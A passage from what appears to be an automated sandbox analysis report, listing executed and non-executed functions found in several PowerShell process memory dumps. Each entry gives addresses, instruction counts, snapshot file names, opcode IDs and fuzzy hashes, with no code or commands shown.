                                                                        • Opcode ID: 4e01388b1a0c4863359027afea0a59a0fbfb40cbddc052fb08400e2693d00239
                                                                        • Instruction ID: a5372c447c00addbbc77a6c72b33965d61015650beaa7d526ab079c19261d536
                                                                        • Opcode Fuzzy Hash: 4e01388b1a0c4863359027afea0a59a0fbfb40cbddc052fb08400e2693d00239
                                                                        • Instruction Fuzzy Hash: F3513922F0EA9A0FEBA98B6C442257477D2EF98310B1D00BED15EC71A3DE15EC058781
                                                                        Function 00007FFD9B8B4370 Relevance: .1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1896140244.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7147d3fb40f143d33425e949fab759488984a4f629b6c99b96e034cc4b7e3730
                                                                        • Instruction ID: a0bbce511a229a836af987d07b5d0d3a4a8d58f92fb5240c641a1cbc8080c438
                                                                        • Opcode Fuzzy Hash: 7147d3fb40f143d33425e949fab759488984a4f629b6c99b96e034cc4b7e3730
                                                                        • Instruction Fuzzy Hash: 5A41E622B0EA990FEBA9D77854229B877D1EF89320B0D00BED05EC71A7E915AD148781
                                                                        Function 00007FFD9B7E9750 Relevance: .1, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1895379010.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0df82213f91df3b190222c77377976b7ffa9fd44cda85d32b909c2c668607402
                                                                        • Instruction ID: adffc7462c6fefda34febbfca44cb219ade5876a0b2499b4694c984bc07ceaa2
                                                                        • Opcode Fuzzy Hash: 0df82213f91df3b190222c77377976b7ffa9fd44cda85d32b909c2c668607402
                                                                        • Instruction Fuzzy Hash: 0441273190DB888FDB18DF5C9C0A6A97FE0EF56310F04426FE459932A2CA74AD15CBC6
                                                                        Function 00007FFD9B6CEF00 Relevance: .1, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1894441840.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b6cd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6420c7ab87bdd7fec1818cc6ab5655ac45be0e06083c50b6f16ee317f3228d13
                                                                        • Instruction ID: 6695b0d4c27d16cda30dd67444c53e803980dcdbc76226a66a7418404946755b
                                                                        • Opcode Fuzzy Hash: 6420c7ab87bdd7fec1818cc6ab5655ac45be0e06083c50b6f16ee317f3228d13
                                                                        • Instruction Fuzzy Hash: EB41057140EBC44FD756AB2898659623FF0EF52220B1A01DFD098CF1A3D625B846C7A2
                                                                        Function 00007FFD9B7EA49C Relevance: .1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1895379010.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e8ed430849548e6b02d7a2647ba548c2c5e57a580bf1efe836198531b1d60d9
                                                                        • Instruction ID: 2c024156510b3bae5b0da70aa95956434f0062f64a5b0fb3814b6bf7b3cd7af4
                                                                        • Opcode Fuzzy Hash: 9e8ed430849548e6b02d7a2647ba548c2c5e57a580bf1efe836198531b1d60d9
                                                                        • Instruction Fuzzy Hash: 0E21E93190C74C4FDB59DBAC984A7E97BE0EB96321F04426FD049C3162DA74A416CB92
                                                                        Function 00007FFD9B8B40BF Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1896140244.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76ff2b87d8d330821ba946e65fe05062ce7565b65fd89cfe8595f5b3c761f292
                                                                        • Instruction ID: 1fe007b80677ee9bc0573b50a35c284ddf6edfe20ff986f7e511645bed004906
                                                                        • Opcode Fuzzy Hash: 76ff2b87d8d330821ba946e65fe05062ce7565b65fd89cfe8595f5b3c761f292
                                                                        • Instruction Fuzzy Hash: B121B122F0EA9B4FEBB58B68446357466D2EF59310B5E00BED05EC71B3DE18EC058B81
                                                                        Function 00007FFD9B8B43BC Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1896140244.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 737e6ae2ea333924091fe0223502f7e5a522f0d2e93e41726fe17d3467f109ba
                                                                        • Instruction ID: 4c7fa6c5037be8c8846e186e4a96de86683b52354d36b7ec8160c0cf77eb8e48
                                                                        • Opcode Fuzzy Hash: 737e6ae2ea333924091fe0223502f7e5a522f0d2e93e41726fe17d3467f109ba
                                                                        • Instruction Fuzzy Hash: E711C132A0F6990FE7B4D76894729B87AD1EF4831074E00BAD06DC70A7D919AD108B81
                                                                        Function 00007FFD9B7E33B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1895379010.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41

                                                                        Non-executed Functions

                                                                        Function 00007FFD9B7E8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1895379010.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                        • API String ID: 0-962139525
                                                                        • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                        • Instruction ID: b114a5ea51b1871e90ed1c4dc2c7250fd3b437a7b478e6d328b580f01d32eadd
                                                                        • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                        • Instruction Fuzzy Hash: BC210477B045658AC30676ACB8559DC7790DF9437A39643F3E029CF193ED18A48B8A80

                                                                        Executed Functions

                                                                        Function 00007FFD9B8C660A Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2069216343.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X7/p
                                                                        • API String ID: 0-1287668245
                                                                        • Opcode ID: e5d5ce9327e7a2dee12f2696af0f1893e9106a1f22ef79c0a2eeb190fe81eaf1
                                                                        • Instruction ID: d87b5b738c66279e2466f11218128fcb8c9ce48d716af154b19e976609ee31f2
                                                                        • Opcode Fuzzy Hash: e5d5ce9327e7a2dee12f2696af0f1893e9106a1f22ef79c0a2eeb190fe81eaf1
                                                                        • Instruction Fuzzy Hash: C6C148B2B0FA8E4FEB64EB6888645B57BD0EF69314B1901BFD45CC70E3D918A905C341
                                                                        Function 00007FFD9B8C662C Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2069216343.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X7/p
                                                                        • API String ID: 0-1287668245
                                                                        • Opcode ID: 59b22d7ceaf7b48ef1ec0f961e476046e642bcf50eda92d7657ca0434ec3089f
                                                                        • Instruction ID: ba605c1abd826f00600659e32f423f9739e51640e22f0bd48285e96cc2d94d8a
                                                                        • Opcode Fuzzy Hash: 59b22d7ceaf7b48ef1ec0f961e476046e642bcf50eda92d7657ca0434ec3089f
                                                                        • Instruction Fuzzy Hash: 3481E2E2B0FACA4FEBB5ABA844745747AD1EF29204B1A01FFD45DCB1E7D919AC058301
                                                                        Function 00007FFD9B7F9F7C Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2068144490.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f1e4d26e91c3322fb66456209913ccd1a785264689557fa132f14691edd0322
                                                                        • Instruction ID: 7094b0c3b2bddf191846cf1e18d09c05e9297cc430ef8584dfce7f61270069fd
                                                                        • Opcode Fuzzy Hash: 7f1e4d26e91c3322fb66456209913ccd1a785264689557fa132f14691edd0322
                                                                        • Instruction Fuzzy Hash: 5B519023F0B79D0BE711EBADA8760E93BB0EF51729B0942B3C4D84A073FD15154686C6
                                                                        Function 00007FFD9B7F9738 Relevance: .1, Instructions: 144COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2068144490.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa7f17168584c8fd06b6ed7c8c112e1897f3b19caeaaa28ab6b733031eaff19b
                                                                        • Instruction ID: 10ece851bbeeccef94622cf9bc970e1f780d18dfe7058a4d64c790640261c2f3
                                                                        • Opcode Fuzzy Hash: fa7f17168584c8fd06b6ed7c8c112e1897f3b19caeaaa28ab6b733031eaff19b
                                                                        • Instruction Fuzzy Hash: 4F412B71A0DB8C8FDB589F5C981A6B9BBE0FB94710F50422FE049C3252DA20F955C7C6
                                                                        Function 00007FFD9B6DEE20 Relevance: .1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2067014524.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b6dd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7faf57e77eaa690fe42b339345600048b4fff7fada3b5bd3a4c95e249fbf5633
                                                                        • Instruction ID: e88c3a1d3d566c6f8b93bfbe3158c8bf619dd80819db6c66fd3b0ea909292578
                                                                        • Opcode Fuzzy Hash: 7faf57e77eaa690fe42b339345600048b4fff7fada3b5bd3a4c95e249fbf5633
                                                                        • Instruction Fuzzy Hash: 5441087150EBC44FD7669B299C519523FF0EF92320B1606DFD0D8CB1A3D625A846C792
                                                                        Function 00007FFD9B7FA47C Relevance: .1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2068144490.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30c1dc012293238f42312c9ce0a6aa1dc00cf2feb4b590c7076306f383b49e02
                                                                        • Instruction ID: 2d4f56481e7cc3ff1577ec5ed7025841bf5960739dcdc643ed8af641abfa95b9
                                                                        • Opcode Fuzzy Hash: 30c1dc012293238f42312c9ce0a6aa1dc00cf2feb4b590c7076306f383b49e02
                                                                        • Instruction Fuzzy Hash: 23212830A0C74C8FDB59DFAC984A7E97FF0EB9A321F04426BD048C3162DA74A416CB91
                                                                        Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2068144490.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45
                                                                        Function 00007FFD9B8C414D Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2069216343.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 666e632136b87a5c2858ffe785fc37527ec6747820700dc1713ea9bbe225ea58
                                                                        • Instruction ID: 28a36640f366a76dc6f49475190aa50477c0a956d712feaa03d2db6f36fee9b3
                                                                        • Opcode Fuzzy Hash: 666e632136b87a5c2858ffe785fc37527ec6747820700dc1713ea9bbe225ea58
                                                                        • Instruction Fuzzy Hash: 1BF03A32B0E5498FD769EB5CE4518A877E0EF5932071600BBE1ADC75B7DA25EC818740
                                                                        Function 00007FFD9B8C4400 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2069216343.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9e7a5c2107ba20b7696a1a26dfb5d21d6373c88c7b93adba6cee01360e598b6
                                                                        • Instruction ID: 84a45fde2d293ef4ad8ad2265e3c066a8a487d53881931af4e0a838c1f805715
                                                                        • Opcode Fuzzy Hash: e9e7a5c2107ba20b7696a1a26dfb5d21d6373c88c7b93adba6cee01360e598b6
                                                                        • Instruction Fuzzy Hash: 3AF05E72B0E5498FDB68EB5CE4618A877E0FF4932475600BBE15DCB4A3DA25EC80C750
                                                                        Function 00007FFD9B8C41D1 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2069216343.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction ID: 19611bf992d818319ffca05ef679498bf87821be3afbc0c8495d4bacff4bf068
                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                        • Instruction Fuzzy Hash: DCE0E531B0C8088FDA78EB4CE0519A973E1EB9832171611ABD18EC7562CA22ED918B80

                                                                        Non-executed Functions

                                                                        Function 00007FFD9B7F8995 Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2068144490.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^$L_^$L_^$L_^
                                                                        • API String ID: 0-2357752022
                                                                        • Opcode ID: 8dd9171f893d751be5f7e65124a3f8aed34b5b07d91b8b5b9dddd946189df6d7
                                                                        • Instruction ID: 2787d9b34c5bcdb08a0f068cf0ed7e90437bfd27e0fe11ac27910e74640e46ea
                                                                        • Opcode Fuzzy Hash: 8dd9171f893d751be5f7e65124a3f8aed34b5b07d91b8b5b9dddd946189df6d7
                                                                        • Instruction Fuzzy Hash: CD41A363B0F7D65FE326876949750997FA0FF1236470A53F7C1D48B0B3EE18250A8296
                                                                        Function 00007FFD9B7F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2068144490.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^4$L_^7$L_^F$L_^J
                                                                        • API String ID: 0-3225005683
                                                                        • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                        • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                                                        • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                        • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0

                                                                        Executed Functions

                                                                        Function 00007FFD9B7DB258 Relevance: .5, Instructions: 452COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2354322619.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 007ca6c5e06f482370b3751d72c218dece4b8c28a17ccf2661ef0489ab40c30e
                                                                        • Instruction ID: 6b651cf6ffd3f62b89fca67f9d0bdb45a3be7f5e07ab7175c1a9c4cf5f5ca77b
                                                                        • Opcode Fuzzy Hash: 007ca6c5e06f482370b3751d72c218dece4b8c28a17ccf2661ef0489ab40c30e
                                                                        • Instruction Fuzzy Hash: 78D14830A1DB8D4FD758DF6C8895AB57BE1EFA9350F1002BED089C72A6DA25E806C741
                                                                        Function 00007FFD9B8A660A Relevance: .4, Instructions: 420COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2355648739.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 181381ccd33f3202f944878a705b9fc56f9aa4666473fc4153dc61cfc76ab181
                                                                        • Instruction ID: 63358c156a22a5bcf8ce3cb2c976babfbadac47628af7bb5e7486898b566573a
                                                                        • Opcode Fuzzy Hash: 181381ccd33f3202f944878a705b9fc56f9aa4666473fc4153dc61cfc76ab181
                                                                        • Instruction Fuzzy Hash: D0C147B2F0FA8E4FEB65DBA848645B9BBD0EF19314B0901BED45CC70EBD918A805C351
                                                                        Function 00007FFD9B8A6660 Relevance: .2, Instructions: 244COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2355648739.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c72ed63d17de6819642f0a2dfe08c3ba6433fb77496fbdec6137b18c594512e
                                                                        • Instruction ID: 6369fd532c7316dfee299075c05dbecba2252d7ab5549c9498afd54b318f8a8f
                                                                        • Opcode Fuzzy Hash: 8c72ed63d17de6819642f0a2dfe08c3ba6433fb77496fbdec6137b18c594512e
                                                                        • Instruction Fuzzy Hash: 37712BA2F1FACA4FEBB5D7A84474574BAD1EF19614B1A01FEC45CCB0EBD918AC048351
                                                                        Function 00007FFD9B7D9750 Relevance: .1, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2354322619.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a972cf6c87676428b4eec002ac93e3b01f576ebbdf31068492a89c1eae20462
                                                                        • Instruction ID: d5525f25e61cea5411203e86b1cb9906f1a8359af15f5976c6677f57d228de52
                                                                        • Opcode Fuzzy Hash: 9a972cf6c87676428b4eec002ac93e3b01f576ebbdf31068492a89c1eae20462
                                                                        • Instruction Fuzzy Hash: 98413B71A0DB884FDB59DB5C9C1A5B8BFE0FB95310F04426FE089C32A2D660A915CBC2
                                                                        Function 00007FFD9B6BED40 Relevance: .1, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2352814177.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b6bd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fcb074ed58c569c76c790666cb44daaa95c05279471aad7efacaa4fcc2ae49f
                                                                        • Instruction ID: ff9f0181a52fd42d870ec363daaea37596f278735ac6ea88436728a16515077f
                                                                        • Opcode Fuzzy Hash: 0fcb074ed58c569c76c790666cb44daaa95c05279471aad7efacaa4fcc2ae49f
                                                                        • Instruction Fuzzy Hash: 6B410A7140EBC44FE7A69B3898559523FF0EF57320B1606DFD0D8CB1A3D625A846C792
                                                                        Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2354322619.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                        • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                                        • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                        • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                                                        Function 00007FFD9B7DA0FB Relevance: .0, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2354322619.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fec52078fab884fcedf08c339013fad4f603d0863ad0f9bb896c2d97bacec8eb
                                                                        • Instruction ID: fe895a60442947d3110960743cd52a0a0739688482d866378c7f8233652a927b
                                                                        • Opcode Fuzzy Hash: fec52078fab884fcedf08c339013fad4f603d0863ad0f9bb896c2d97bacec8eb
                                                                        • Instruction Fuzzy Hash: E4F0F636A49A8D4FC751EF6CA8690D47FA0FF55211B0502BBE548C7071DB214948C7C1
                                                                        Function 00007FFD9B8A414D Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2355648739.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e088b48f0fc8ea1fdeef957784ea9df10cedef653184541d19bc518e674557db
                                                                        • Instruction ID: 03f76711dd0aed30713d7ac09a085298191c649888a963f71a3de5a5d3e3391a
                                                                        • Opcode Fuzzy Hash: e088b48f0fc8ea1fdeef957784ea9df10cedef653184541d19bc518e674557db
                                                                        • Instruction Fuzzy Hash: 0FF0BE32B0E5098FDB68EB4CE4518E877E0EF5932071600BAE06DC71B3CA25EC40C750
                                                                        Function 00007FFD9B8A4400 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2355648739.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3aca2d56e572220def85f0ae341a8a845a237d25441f7988e55bb5647cf3fee
                                                                        • Instruction ID: d3acda6501851c01575bcdeb5a278ebac376cb8013a8c565bd0db1e769e46701
